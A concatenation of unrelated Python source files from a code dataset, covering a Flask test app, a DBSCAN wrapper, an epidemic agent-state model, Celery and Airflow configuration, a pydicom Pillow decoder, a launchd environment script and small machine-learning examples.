Testing Flask installation
"""
from werkzeug.routing import BaseConverter
from flask import Flask,render_template,request
class RegexConvert(BaseConverter):
def __init__(self,url_map,*itms):
super(RegexConvert,self).__init__(url_map)
self.regex=itms[0]
app = Flask(__name__)
@app.route('/')
def hello():
return render_template('index.html', title = 'Welcome')
@app.route('/services')
def services():
return 'services'
@app.route('/login')
def login():
return render_template('login.html', method=request.method)
if __name__ == '__main__':
app.run(debug=True)
| StarcoderdataPython |
3378698 | <reponame>toolkmit/algotrading
from .cnn import cnn | StarcoderdataPython |
3214941 | #
#*******************************************************************************
# Copyright 2014-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#******************************************************************************/
import numpy as np
import warnings
from scipy import sparse
from sklearn.utils import (check_array, check_consistent_length)
from sklearn.cluster import DBSCAN as DBSCAN_original
import daal4py
from daal4py.sklearn._utils import (make2d, getFPType)
def _daal_dbscan(X, eps=0.5, min_samples=5, sample_weight=None):
if not eps > 0.0:
raise ValueError("eps must be positive.")
X = check_array(X, dtype=[np.float64, np.float32])
if sample_weight is not None:
sample_weight = np.asarray(sample_weight)
check_consistent_length(X, sample_weight)
ww = make2d(sample_weight)
else:
ww = None
XX = make2d(X)
fpt = getFPType(XX)
alg = daal4py.dbscan(
method='defaultDense',
epsilon=float(eps),
minObservations=int(min_samples),
resultsToCompute="computeCoreIndices")
daal_res = alg.compute(XX, ww)
n_clusters = daal_res.nClusters[0, 0]
assignments = daal_res.assignments.ravel()
if daal_res.coreIndices is not None:
core_ind = daal_res.coreIndices.ravel()
else:
core_ind = np.array([], dtype=np.intc)
return (core_ind, assignments)
class DBSCAN(DBSCAN_original):
"""Perform DBSCAN clustering from vector array or distance matrix.
DBSCAN - Density-Based Spatial Clustering of Applications with Noise.
Finds core samples of high density and expands clusters from them.
Good for data which contains clusters of similar density.
Read more in the :ref:`User Guide <dbscan>`.
Parameters
----------
eps : float, optional
The maximum distance between two samples for one to be considered
as in the neighborhood of the other. This is not a maximum bound
on the distances of points within a cluster. This is the most
important DBSCAN parameter to choose appropriately for your data set
and distance function.
min_samples : int, optional
The number of samples (or total weight) in a neighborhood for a point
to be considered as a core point. This includes the point itself.
metric : string, or callable
The metric to use when calculating distance between instances in a
feature array. If metric is a string or callable, it must be one of
the options allowed by :func:`sklearn.metrics.pairwise_distances` for
its metric parameter.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square. X may be a :term:`Glossary <sparse graph>`, in which
case only "nonzero" elements may be considered neighbors for DBSCAN.
.. versionadded:: 0.17
metric *precomputed* to accept precomputed sparse matrix.
metric_params : dict, optional
Additional keyword arguments for the metric function.
.. versionadded:: 0.19
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute', 'daal'}, optional
The algorithm to be used by the NearestNeighbors module
to compute pointwise distances and find nearest neighbors.
See NearestNeighbors module documentation for details.
If algorithm is set to 'daal', Intel(R) DAAL will be used.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or cKDTree. This can affect the speed
of the construction and query, as well as the memory required
to store the tree. The optimal value depends
on the nature of the problem.
p : float, optional
The power of the Minkowski metric to be used to calculate distance
between points.
n_jobs : int or None, optional (default=None)
The number of parallel jobs to run.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Attributes
----------
core_sample_indices_ : array, shape = [n_core_samples]
Indices of core samples.
components_ : array, shape = [n_core_samples, n_features]
Copy of each core sample found by training.
labels_ : array, shape = [n_samples]
Cluster labels for each point in the dataset given to fit().
Noisy samples are given the label -1.
Examples
--------
>>> from sklearn.cluster import DBSCAN
>>> import numpy as np
>>> X = np.array([[1, 2], [2, 2], [2, 3],
... [8, 7], [8, 8], [25, 80]])
>>> clustering = DBSCAN(eps=3, min_samples=2).fit(X)
>>> clustering.labels_
array([ 0, 0, 0, 1, 1, -1])
>>> clustering
DBSCAN(eps=3, min_samples=2)
See also
--------
OPTICS
A similar clustering at multiple values of eps. Our implementation
is optimized for memory usage.
Notes
-----
For an example, see :ref:`examples/cluster/plot_dbscan.py
<sphx_glr_auto_examples_cluster_plot_dbscan.py>`.
This implementation bulk-computes all neighborhood queries, which increases
the memory complexity to O(n.d) where d is the average number of neighbors,
while original DBSCAN had memory complexity O(n). It may attract a higher
memory complexity when querying these nearest neighborhoods, depending
on the ``algorithm``.
One way to avoid the query complexity is to pre-compute sparse
neighborhoods in chunks using
:func:`NearestNeighbors.radius_neighbors_graph
<sklearn.neighbors.NearestNeighbors.radius_neighbors_graph>` with
``mode='distance'``, then using ``metric='precomputed'`` here.
Another way to reduce memory and computation time is to remove
(near-)duplicate points and use ``sample_weight`` instead.
:class:`cluster.OPTICS` provides a similar clustering with lower memory
usage.
References
----------
<NAME>., <NAME>, <NAME>, and <NAME>, "A Density-Based
Algorithm for Discovering Clusters in Large Spatial Databases with Noise".
In: Proceedings of the 2nd International Conference on Knowledge Discovery
and Data Mining, Portland, OR, AAAI Press, pp. 226-231. 1996
<NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2017).
DBSCAN revisited, revisited: why and how you should (still) use DBSCAN.
ACM Transactions on Database Systems (TODS), 42(3), 19.
"""
def __init__(self, eps=0.5, min_samples=5, metric='euclidean',
metric_params=None, algorithm='auto', leaf_size=30, p=None,
n_jobs=None):
self.eps = eps
self.min_samples = min_samples
self.metric = metric
self.metric_params = metric_params
self.algorithm = algorithm
self.leaf_size = leaf_size
self.p = p
self.n_jobs = n_jobs
def fit(self, X, y=None, sample_weight=None):
"""Perform DBSCAN clustering from features, or distance matrix.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features), or \
(n_samples, n_samples)
Training instances to cluster, or distances between instances if
``metric='precomputed'``. If a sparse matrix is provided, it will
be converted into a sparse ``csr_matrix``.
sample_weight : array, shape (n_samples,), optional
Weight of each sample, such that a sample with a weight of at least
``min_samples`` is by itself a core sample; a sample with a
negative weight may inhibit its eps-neighbor from being core.
Note that weights are absolute, and default to 1.
y : Ignored
Not used, present here for API consistency by convention.
Returns
-------
self
"""
X = check_array(X, accept_sparse='csr')
if not self.eps > 0.0:
raise ValueError("eps must be positive.")
if sample_weight is not None:
sample_weight = np.asarray(sample_weight)
check_consistent_length(X, sample_weight)
_daal_ready = ((self.algorithm in ['auto', 'brute']) and
(self.metric == 'euclidean' or
(self.metric == 'minkowski' and self.p == 2)) and
isinstance(X, np.ndarray) and (X.dtype.kind in ['d', 'f']))
if _daal_ready:
core_ind, assignments = _daal_dbscan(
X, self.eps,
self.min_samples,
sample_weight=sample_weight)
self.core_sample_indices_ = core_ind
self.labels_ = assignments
self.components_ = np.take(X, core_ind, axis=0)
return self
else:
return super().fit(X, y, sample_weight=sample_weight)
| StarcoderdataPython |
4814735 | print()
# ----------------------------
print('# ')
def draw_box(height, width): # функция принимает два параметра
for i in range(height):
print('*' * width)
draw_box(10, 100)
print()
# ----------------------------
print('# прямоугольники разных размеров:')
draw_box(3, 3)
print()
draw_box(5, 5)
print()
draw_box(4, 10)
print()
# ----------------------------
print('# параметры - переменные')
n = 3
m = 9
draw_box(n, m)
print()
# ----------------------------
print('# параметры - переменные 02:')
def print_hello(n):
print('Hello' * n)
print_hello(3)
print_hello(5)
times = 2
print_hello(times)
print()
# ----------------------------
print('# функция: два параметра')
def print_text(txt, n):
print(txt * n)
print_text('Hello', 5)
print_text('A', 10)
print()
# ----------------------------
print('# функции: аргументы. параметры')
def draw_box(height, width):
for i in range(height):
print('*' * width)
# параметрами являются переменные height и width.
# В момент вызова функции draw_box(height, width):
# аргументами являются height и 9.
height = 10
draw_box(height, 9)
print()
# ----------------------------
print('# функции: внесение изменений в переменные.')
def draw_box(height, width):
height = 2
width = 10
for i in range(height):
print('*' * width)
n = 5
m = 7
draw_box(n, m)
print(n, m)
print()
# ----------------------------
print('# ')
print()
# ----------------------------
print('# ')
print()
| StarcoderdataPython |
12737 | import transitions
from functools import partial
# from transitions import transitions.Machine
# TODO: whenever there is a state chage store the following
# (DAY,function_called) -> Stored for every person for agent status, state and Testing state
class AgentStatusA(object):
"""The Statemachine of the agent"""
status = ['Free','Quarentined','Out_of_city','Hospitalized','ICU','Isolation']
def __init__(self):
"""Agent Status class is responsible for figuring out the Mobility of the agent, the agent mobility can be
'Free','Quarentined','Out_of_city','Hospitalized','ICU','Isolation'
"""
super(AgentStatusA, self).__init__()
self.ADDED_BIT = True
self.TruthStatus = None
self.Last_Added_Placeholder = None
self.buffer = []
self.Status = self.status[0]
# def log_update(self,message):
def update_objects(self,TruthStatus):
"""Update object of Virusmodel
Args:
TruthStatus (object): Truth State object to update
"""
self.TruthStatus = TruthStatus
def __remove_from_transport__(self):
if self.useTN == True:
self.City.TravellingCitizens.remove(self)
#print('Person {} removed from travelling list of City {}. New length = {}'.format(self.IntID, self.City.Name, len(self.City.TravellingCitizens)))
def _remove_(self):
"""Remove from workplace and transport list
"""
if self.ADDED_BIT:
obj = self.get_workplace_obj()
if obj !=None:
self.buffer.append('_remove_')
obj.Working.remove(self)
self.ADDED_BIT = False
self.__remove_from_transport__()
def _add_(self):
"""Add to workplace and transport list
"""
if ~self.ADDED_BIT:
obj = self.get_workplace_obj()
if obj != None:
if obj.Working!=None:
self.buffer.append('_add_')
obj.Working.add(self)
self.ADDED_BIT = True
if self.useTN == True:
self.City.TravellingCitizens.add(self)
def _left_(self):
"""Leave city, calls remove
"""
self._remove_()
def _entered_(self):
"""Come back to city
"""
self._add_()
def __remove_from_placeholder__(self):
"""Remove the person from the Truth Status Placeholders
Returns:
bool: Whether Removed or not
"""
try:
if self.Last_Added_Placeholder == 0: # If he is AFreeP
self.TruthStatus.AFreeP.remove(self)
return True
elif self.Last_Added_Placeholder == 1: # If he was Quarentined
self.TruthStatus.AQuarentinedP.remove(self)
return True
elif self.Last_Added_Placeholder == 2: # If he was Isolated
self.TruthStatus.SIsolatedP.remove(self)
return True
elif self.Last_Added_Placeholder == 3: # If he was Hospitalized
self.TruthStatus.SHospitalizedP.remove(self)
return True
elif self.Last_Added_Placeholder == 4: # If he was Icu
self.TruthStatus.SIcuP.remove(self)
return True
else:
return False
except:
self.about()
raise
def leave_city(self):
acceptable_states = [self.status[0]]
try:
assert self.Status in acceptable_states
except:
print('##########', self.Status)
raise
self.Status = self.status[2]
self._left_()
self.__remove_from_placeholder__()
self.Last_Added_Placeholder = None
def enter_city(self):
acceptable_states = [self.status[2]]
try:
assert self.Status in acceptable_states
except:
print('##########', self.Status)
raise
self.Status = self.status[0]
self._entered_()
if self.is_Asymptomatic():
self.TruthStatus.AFreeP.add(self)
self.Last_Added_Placeholder = 0
def quarentined(self,DAY):
acceptable_states = [self.status[0],self.status[1],self.status[2]]
assert self.Status in acceptable_states
if self.Last_Added_Placeholder != 1:
self.__remove_from_placeholder__()
if self.is_Free(): # If free add to quarentined placeholders
self.TruthStatus.AQuarentinedP.add(self)
self.Last_Added_Placeholder = 1
self.Status = self.status[1]
self._remove_()
def hospitalized(self,DAY):
acceptable_states = [self.status[0],self.status[1]]
assert self.Status in acceptable_states
self.Status = self.status[3]
self._remove_()
self.show_symptoms(DAY)
if self.__remove_from_placeholder__(): #If person is in city and removal is successful
self.TruthStatus.SHospitalizedP.add(self)
self.Last_Added_Placeholder = 3
def admit_icu(self,DAY):
acceptable_states = [self.status[0],self.status[1],self.status[3]]
assert self.Status in acceptable_states
self.Status = self.status[4]
self._remove_()
self.show_symptoms(DAY)
if self.__remove_from_placeholder__(): #If person is in city and removal is successful
self.TruthStatus.SIcuP.add(self)
self.Last_Added_Placeholder = 4
def isolate(self,Today):
acceptable_states = [self.status[0],self.status[1],self.status[3],self.status[4],self.status[5]]
assert self.Status in acceptable_states
if self.Status == self.status[0] or self.Status == self.status[1]:
self.show_symptoms(Today)
if self.Last_Added_Placeholder != 2:
if self.__remove_from_placeholder__(): #If person is in city and removal is successful
self.TruthStatus.SIsolatedP.add(self)
self.Last_Added_Placeholder = 2
self.Status = self.status[5]
self._remove_()
def is_Free(self):
return self.Status == self.status[0]
def is_Quarentined(self):
return self.Status == self.status[1]
def is_Out_of_City(self):
return self.Status == self.status[2]
def is_Hospitalized(self):
return self.Status == self.status[3]
def is_ICU(self):
return self.Status == self.status[4]
def is_Isolation(self):
return self.Status == self.status[5]
class AgentStateA(AgentStatusA):
states = ['Healthy','Asymptomatic','Symptomatic','Recovered','Died']
def __init__(self):
"""Agent status is the status of person with respect ot the virus
"""
super(AgentStateA, self).__init__()
#self = person
self.State = self.states[0]
self.TruthStatus = None
def infected(self,DAY):
acceptable_states = [self.states[0]]
assert self.State in acceptable_states
self.State = self.states[1]
self.TruthStatus.AFreeP.add(self)
self.Last_Added_Placeholder = 0
self.History["Infected"] = DAY
def show_symptoms(self,DAY):
acceptable_states = [self.states[1],self.states[2]]
assert self.State in acceptable_states
self.State = self.states[2]
self.History["Symptomatic"] = DAY
def recover(self,DAY):
acceptable_states = [self.states[2]]
assert self.State in acceptable_states
self.State = self.states[3]
self.Status = self.status[5]
if self.__remove_from_placeholder__(): #Removal is succesful, mtlb seher me h
self.TruthStatus.RRecoveredP.add(self)
self.Last_Added_Placeholder =5
self.History["Recovered"] = DAY
self.History["Died"] = -1
def die(self,DAY):
acceptable_states = [self.states[2]]
assert self.State in acceptable_states
self.State = self.states[4]
self.Status = self.status[5]
if self.__remove_from_placeholder__(): #Removal is succesful, mtlb seher me h
self.TruthStatus.RDiedP.add(self)
self.Last_Added_Placeholder = 6
self.History["Recovered"] = -1
self.History["Died"] = DAY
def is_Healthy(self):
return self.State == self.states[0]
def is_Asymptomatic(self):
return self.State == self.states[1]
def is_Symptomatic(self):
return self.State == self.states[2]
def is_Recovered(self):
return self.State == self.states[3]
def is_Died(self):
return self.State == self.states[4]
class TestingState(object):
"""Summary
Attributes:
in_stack (bool): Description
machine (TYPE): Description
state (str): Description
tested (bool): Description
"""
machine = transitions.Machine(model=None, states=['Not_tested', 'Awaiting_Testing', 'Tested_Positive','Tested_Negative'], initial='Not_tested',
transitions=[
{'trigger': 'awaiting_test', 'source': ['Not_tested','Awaiting_Testing','Tested_Negative'], 'dest': 'Awaiting_Testing','before':'add_to_TestingQueue'},
{'trigger': 'tested_positive', 'source': 'Awaiting_Testing', 'dest': 'Tested_Positive','before':'tested_positive_func'},
{'trigger': 'tested_negative', 'source': 'Awaiting_Testing', 'dest': 'Tested_Negative','before':'tested_negative_func'},
])
def __init__(self):
"""This is responsible for updating testing state of the person
Deleted Parameters:
person (object): Home object
VM (object): Virusmodel object
"""
super().__init__()
self.state = 'Not_tested'
def __remove_from_testing_list__(self):
self.City.TestingQueue.remove(self)
def add_to_TestingQueue(self, PrivateTest=False):
"""Summary
"""
# This function is for the City to add citizens into testingQueue
if PrivateTest == False:
if self.state != 'Awaiting_Testing' :
self.City.TestingQueue.append(self)
if self.state == 'Tested_Negative':
self.City.TestedP['Negative'].remove(self)
#print('City {} added person {}'.format(self.City.Name, self.IntID))
#pass type of test
def tested_positive_func(self,Today, PrivateTest=False):
"""Summary
"""
self.City.TestedP['Positive'].add(self)
self.City.NumTestedPositive += 1
if PrivateTest == False:
self.__remove_from_testing_list__()
if self.is_Quarentined():
self.isolate(Today)
def tested_negative_func(self, PrivateTest=False):
"""Summary
"""
self.City.TestedP['Negative'].add(self)
if PrivateTest == False:
self.__remove_from_testing_list__()
def __getattribute__(self, item):
"""Summary
Args:
item (TYPE): Description
Returns:
TYPE: Description
"""
try:
return super(TestingState, self).__getattribute__(item)
except AttributeError:
if item in self.machine.events:
return partial(self.machine.events[item].trigger, self)
raise
| StarcoderdataPython |
165142 | <reponame>ryanchao2012/airfly
# Auto generated by 'inv collect-airflow'
from airfly._vendor.airflow.models.baseoperator import BaseOperator
class EmrAddStepsOperator(BaseOperator):
job_flow_id: "typing.Union[str, NoneType]"
job_flow_name: "typing.Union[str, NoneType]"
cluster_states: "typing.Union[typing.List[str], NoneType]"
aws_conn_id: "str"
steps: "typing.Union[typing.List[dict], str, NoneType]"
| StarcoderdataPython |
1695446 | <reponame>tumb1er/celery-amqp-events
""" Default configuration for EventsCelery."""
from typing import Any, Dict, Tuple, Optional
from celery.app.task import Task
AMQP_EVENTS_CONFIG: Dict[str, Any] = {
# Connections
'broker_url': 'amqp://guest:guest@localhost:5672/',
'result_backend': None,
# Queues and routing
'task_queues': [],
'task_default_exchange': 'events',
'task_default_exchange_type': 'topic',
'task_default_queue': 'events',
'task_default_routing_key': 'events',
'task_routes': ['amqp_events.config:route_for_event'],
# Robustness
'task_acks_late': True,
'task_acks_on_failure_or_timeout': False,
'task_reject_on_worker_lost': True,
'broker_transport_options': {'confirm_publish': True},
}
# noinspection PyUnusedLocal
def route_for_event(name: str,
args: Tuple[Any, ...],
kwargs: Dict[str, Any],
options: Dict[str, Any],
task: Optional[Task] = None,
**kw: Any) -> Dict[str, str]:
# Without explicit routing function Celery tries to declare and bind
# default queue while sending events, which leads to unexpected behavior.
return {
'routing_key': options.get('routing_key', name),
# 'exchange': task.app.conf.task_default_exchange,
# 'exchange_type': task.app.conf.task_default_exchange_type
}
| StarcoderdataPython |
1611708 | <gh_stars>0
# Copyright 2008-2018 pydicom authors. See LICENSE file for details.
"""Use the `pillow <https://python-pillow.org/>`_ Python package
to decode *Pixel Data*.
"""
import io
import logging
from typing import TYPE_CHECKING, cast
import warnings
if TYPE_CHECKING: # pragma: no cover
from pydicom.dataset import Dataset, FileMetaDataset, FileDataset
try:
import numpy
HAVE_NP = True
except ImportError:
HAVE_NP = False
try:
import PIL
from PIL import Image, features
HAVE_PIL = True
HAVE_JPEG = features.check_codec("jpg")
HAVE_JPEG2K = features.check_codec("jpg_2000")
except ImportError:
HAVE_PIL = False
HAVE_JPEG = False
HAVE_JPEG2K = False
from pydicom import config
from pydicom.encaps import defragment_data, decode_data_sequence
from pydicom.pixel_data_handlers.util import pixel_dtype, get_j2k_parameters
from pydicom.uid import (
UID, JPEG2000, JPEG2000Lossless, JPEGBaseline8Bit, JPEGExtended12Bit
)
logger = logging.getLogger('pydicom')
PillowJPEG2000TransferSyntaxes = [JPEG2000, JPEG2000Lossless]
PillowJPEGTransferSyntaxes = [JPEGBaseline8Bit, JPEGExtended12Bit]
PillowSupportedTransferSyntaxes = (
PillowJPEGTransferSyntaxes + PillowJPEG2000TransferSyntaxes
)
HANDLER_NAME = 'Pillow'
DEPENDENCIES = {
'numpy': ('http://www.numpy.org/', 'NumPy'),
'PIL': ('https://python-pillow.org/', 'Pillow'),
}
def is_available() -> bool:
"""Return ``True`` if the handler has its dependencies met."""
return HAVE_NP and HAVE_PIL
def supports_transfer_syntax(transfer_syntax: UID) -> bool:
"""Return ``True`` if the handler supports the `transfer_syntax`.
Parameters
----------
transfer_syntax : uid.UID
The Transfer Syntax UID of the *Pixel Data* that is to be used with
the handler.
"""
return transfer_syntax in PillowSupportedTransferSyntaxes
def needs_to_convert_to_RGB(ds: "Dataset") -> bool:
"""Return ``True`` if the *Pixel Data* should to be converted from YCbCr to
RGB.
This affects JPEG transfer syntaxes.
"""
return False
def should_change_PhotometricInterpretation_to_RGB(ds: "Dataset") -> bool:
"""Return ``True`` if the *Photometric Interpretation* should be changed
to RGB.
This affects JPEG transfer syntaxes.
"""
should_change = ds.SamplesPerPixel == 3
return False
def _decompress_single_frame(
data: bytes,
transfer_syntax: str,
photometric_interpretation: str
) -> "Image":
"""Decompresses a single frame of an encapsulated Pixel Data element.
Parameters
----------
data: bytes
Compressed pixel data
transfer_syntax: str
Transfer Syntax UID
photometric_interpretation: str
Photometric Interpretation
Returns
-------
PIL.Image
Decompressed pixel data
"""
fio = io.BytesIO(data)
image = Image.open(fio)
# This hack ensures that RGB color images, which were not
# color transformed (i.e. not transformed into YCbCr color space)
# upon JPEG compression are decompressed correctly.
# Since Pillow assumes that images were transformed into YCbCr color
# space prior to compression, setting the value of "mode" to YCbCr
# signals Pillow to not apply any color transformation upon
# decompression.
if (transfer_syntax in PillowJPEGTransferSyntaxes and
photometric_interpretation == 'RGB'):
if 'adobe_transform' not in image.info:
color_mode = 'YCbCr'
image.tile = [(
'jpeg',
image.tile[0][1],
image.tile[0][2],
(color_mode, ''),
)]
image.mode = color_mode
image.rawmode = color_mode
return image
def get_pixeldata(ds: "Dataset") -> "numpy.ndarray":
"""Return a :class:`numpy.ndarray` of the *Pixel Data*.
Parameters
----------
ds : Dataset
The :class:`Dataset` containing an Image Pixel module and the
*Pixel Data* to be decompressed and returned.
Returns
-------
numpy.ndarray
The contents of (7FE0,0010) *Pixel Data* as a 1D array.
Raises
------
ImportError
If Pillow is not available.
NotImplementedError
If the transfer syntax is not supported
"""
transfer_syntax = ds.file_meta.TransferSyntaxUID
if not HAVE_PIL:
raise ImportError(
f"The pillow package is required to use pixel_array for "
f"this transfer syntax {transfer_syntax.name}, and pillow could "
f"not be imported."
)
if not HAVE_JPEG and transfer_syntax in PillowJPEGTransferSyntaxes:
raise NotImplementedError(
f"The pixel data with transfer syntax {transfer_syntax.name}, "
f"cannot be read because Pillow lacks the JPEG plugin"
)
if not HAVE_JPEG2K and transfer_syntax in PillowJPEG2000TransferSyntaxes:
raise NotImplementedError(
f"The pixel data with transfer syntax {transfer_syntax.name}, "
f"cannot be read because Pillow lacks the JPEG 2000 plugin"
)
if transfer_syntax == JPEGExtended12Bit and ds.BitsAllocated != 8:
raise NotImplementedError(
f"{JPEGExtended12Bit} - {JPEGExtended12Bit.name} only supported "
"by Pillow if Bits Allocated = 8"
)
photometric_interpretation = cast(str, ds.PhotometricInterpretation)
rows = cast(int, ds.Rows)
columns = cast(int, ds.Columns)
bits_stored = cast(int, ds.BitsStored)
bits_allocated = cast(int, ds.BitsAllocated)
nr_frames = getattr(ds, 'NumberOfFrames', 1) or 1
pixel_bytes = bytearray()
if nr_frames > 1:
j2k_precision, j2k_sign = None, None
# multiple compressed frames
for frame in decode_data_sequence(ds.PixelData):
im = _decompress_single_frame(
frame,
transfer_syntax,
photometric_interpretation
)
if 'YBR' in photometric_interpretation:
im.draft('YCbCr', (rows, columns))
pixel_bytes.extend(im.tobytes())
if not j2k_precision:
params = get_j2k_parameters(frame)
j2k_precision = cast(
int, params.setdefault("precision", bits_stored)
)
j2k_sign = params.setdefault("is_signed", None)
else:
# single compressed frame
pixel_data = defragment_data(ds.PixelData)
im = _decompress_single_frame(
pixel_data,
transfer_syntax,
photometric_interpretation
)
if 'YBR' in photometric_interpretation:
im.draft('YCbCr', (rows, columns))
pixel_bytes.extend(im.tobytes())
params = get_j2k_parameters(pixel_data)
j2k_precision = cast(int, params.setdefault("precision", bits_stored))
j2k_sign = params.setdefault("is_signed", None)
logger.debug(f"Successfully read {len(pixel_bytes)} pixel bytes")
arr = numpy.frombuffer(pixel_bytes, pixel_dtype(ds))
if transfer_syntax in PillowJPEG2000TransferSyntaxes:
# Pillow converts N-bit data to 8- or 16-bit unsigned data,
# See Pillow src/libImaging/Jpeg2KDecode.c::j2ku_gray_i
shift = bits_allocated - bits_stored
if j2k_precision and j2k_precision != bits_stored:
warnings.warn(
f"The (0028,0101) 'Bits Stored' value ({bits_stored}-bit) "
f"doesn't match the JPEG 2000 data ({j2k_precision}-bit). "
f"It's recommended that you change the 'Bits Stored' value"
)
if config.APPLY_J2K_CORRECTIONS and j2k_precision:
# Corrections based on J2K data
shift = bits_allocated - j2k_precision
if not j2k_sign and j2k_sign != ds.PixelRepresentation:
# Convert unsigned J2K data to 2's complement
arr = numpy.right_shift(arr, shift)
else:
if ds.PixelRepresentation == 1:
# Pillow converts signed data to unsigned
# so we need to undo this conversion
arr -= 2**(bits_allocated - 1)
if shift:
arr = numpy.right_shift(arr, shift)
else:
# Corrections based on dataset elements
if ds.PixelRepresentation == 1:
arr -= 2**(bits_allocated - 1)
if shift:
arr = numpy.right_shift(arr, shift)
if should_change_PhotometricInterpretation_to_RGB(ds):
ds.PhotometricInterpretation = "RGB"
return cast("numpy.ndarray", arr)
| StarcoderdataPython |
1732096 |
# coding: utf-8
# In[14]:
import numpy as np
from sklearn import datasets
from sklearn.neighbors import KNeighborsClassifier as KNC
iris = datasets.load_iris()
x= iris.data
y= iris.target
np.unique(y)
np.random.seed(123)
indices = np.random.permutation(len(x))
iris_x_train = x[indices[:-10]]
iris_y_train = y[indices[:-10]]
iris_x_test = x[indices[-10:]]
iris_y_test = y[indices[-10:]]
model=KNC()
model.fit(iris_x_train, iris_y_train)
KNC(algorithm='auto',leaf_size=30, metric='minkowski',
metric_params=None,n_jobs=1,n_neighbors=5, p=2,weights='uniform')
out=model.predict(iris_x_test)
print("predicted:",out)
print("True :",iris_y_test)
| StarcoderdataPython |
3341452 | #! /usr/bin/python
from __future__ import print_function
import argparse
import logging
import os
import pprint
import shlex
import string
import subprocess
import sys
from logging import StreamHandler
from logging.handlers import SysLogHandler
ALPHABET = frozenset(string.ascii_letters)
IDENTIFIER_START = ALPHABET | set('_')
IDENTIFIER = IDENTIFIER_START | set(string.digits)
logger = logging.getLogger()
syslog_sock = None
if os.path.exists('/var/run/syslog'):
syslog_sock = '/var/run/syslog'
elif os.path.exists('/dev/log'):
syslog_sock = '/dev/log'
logger.setLevel(logging.DEBUG)
logger.addHandler(StreamHandler(sys.stdout))
if syslog_sock:
logger.addHandler(SysLogHandler(syslog_sock))
def validate_name(name):
if not name:
return False
if not name[0] in IDENTIFIER_START:
return False
if not set(name) <= IDENTIFIER:
return False
return True
def sanitize_name(name):
name = name.strip()
if not validate_name(name):
raise ValueError('Invalid Name')
return name
def process_value(value):
if not value:
return ''
if value.isspace():
logger.warn(
'Value %s consists solely of spaces - is this a bug?' % repr(value)
)
logger.warn(
'Replacing whitespace value %s with empty string' % repr(value)
)
return ''
orig = value
if value[0].isspace():
logger.warn('Stripping leading space in value=%s' % repr(orig))
value = value.lstrip()
if value[-1].isspace():
logger.warn('Stripping trailing space in value=%s' % repr(orig))
value = value.rstrip()
words = shlex.split(value)
if len(words) > 1:
logger.warn(
'Value %s splits to multiple arguments, joining' % repr(orig)
)
else:
value = words[0]
result = os.path.expandvars(value)
result = os.path.expanduser(result)
return result
def post_process(name, value):
folded = name.upper().lower()
if folded == 'PATH':
lst = value.split(':')
value = ':'.join(os.path.expanduser(elem) for elem in lst)
os.environ[name] = value
return name, value
def process_line(line):
if not line.strip() or line.startswith('#'):
return None, None
tup = line.strip().split('=', 1)
if len(tup) < 2:
raise ValueError("Missing '=' in line %s" % repr(line))
name, value = tup
if not validate_name(name):
try:
name = sanitize_name()
logger.warning(
'Sanitized invalid line: name=%s, value=%s'
% (repr(name), repr(value))
)
except ValueError:
logger.error(
'Skipping invalid line: name=%s, value=%s'
% (repr(name), repr(value))
)
return None, None
value = process_value(value)
name, value = post_process(name, value)
return name, value
def main():
logger.info('Starting setenv script')
env = {name: val for name, val in os.environ.items() if name in ('HOME')}
os.environ.clear()
for name, val in env.items():
os.environ[name] = val
s = pprint.pformat(os.environ)
logger.debug(s)
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--dry-run', action='store_true')
args = parser.parse_args()
directory = os.path.dirname(__file__) or '.'
invocation = ['/bin/launchctl', 'setenv']
with open(os.path.join(directory, 'launchd.env')) as f:
for line in f:
name, value = process_line(line)
if not name:
continue
invocation.append(name)
invocation.append(value)
level = logging.INFO if args.dry_run else logging.DEBUG
for name, value in zip(invocation[2::2], invocation[3::2]):
logger.log(level, '%s=%s' % (name, repr(value)))
s = pprint.pformat(os.environ)
logger.debug(s)
if args.dry_run:
return 0
return subprocess.call(invocation)
if __name__ == '__main__':
sys.exit(main())
| StarcoderdataPython |
1657861 | <filename>Pycharm Repository/Preprocessor.py
import re
import nltk
from sklearn.datasets import load_files
#nltk.download('stopwords')
import pickle
from nltk.corpus import stopwords
test_data = load_files(r"...\txt_sentoken") # folder containing the 2 categories of documents in individual folders.
X, y = test_data.data, test_data.target
documents = []
for sen in range(0, len(X)):
# Remove all the special characters
document = re.sub(r'\W', ' ', str(X[sen]))
# remove all single characters
document = re.sub(r'\s+[a-zA-Z]\s+', ' ', document)
# Remove single characters from the start
document = re.sub(r'\^[a-zA-Z]\s+', ' ', document)
# Substituting multiple spaces with single space
document = re.sub(r'\s+', ' ', document, flags=re.I)
# Removing prefixed 'b'
document = re.sub(r'^b\s+', '', document)
# Converting to Lowercase
document = document.lower()
# Lemmatization
document = document.split()
from nltk.stem import WordNetLemmatizer
stemmer = WordNetLemmatizer()
document = [stemmer.lemmatize(word) for word in document]
document = ' '.join(document)
documents.append(document)
#Convert the word to a vector using BOW model.
from sklearn.feature_extraction.text import CountVectorizer
vectorizer = CountVectorizer(max_features=1500, min_df=0.1, max_df=0.7, stop_words=stopwords.words('english'))
X = vectorizer.fit_transform(documents).toarray()
'''Using TFIDF instead of BOW, TFIDF also takes into account the frequency instead of just the occurance.
calculated as:
Term frequency = (Number of Occurrences of a word)/(Total words in the document)
IDF(word) = Log((Total number of documents)/(Number of documents containing the word))
TF-IDF is the product of the two.
'''
#from sklearn.feature_extraction.text import TfidfTransformer
#from sklearn.feature_extraction.text import TfidfVectorizer
#tfidfconverter = TfidfTransformer()
#tf = TfidfVectorizer()
#X = tf.fit_transform(movie_data.split('\n'))
#X = tfidfconverter.fit_transform(X).toarray()
''' Creating training and test sets of the data'''
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
'''train a clasifier with the data'''
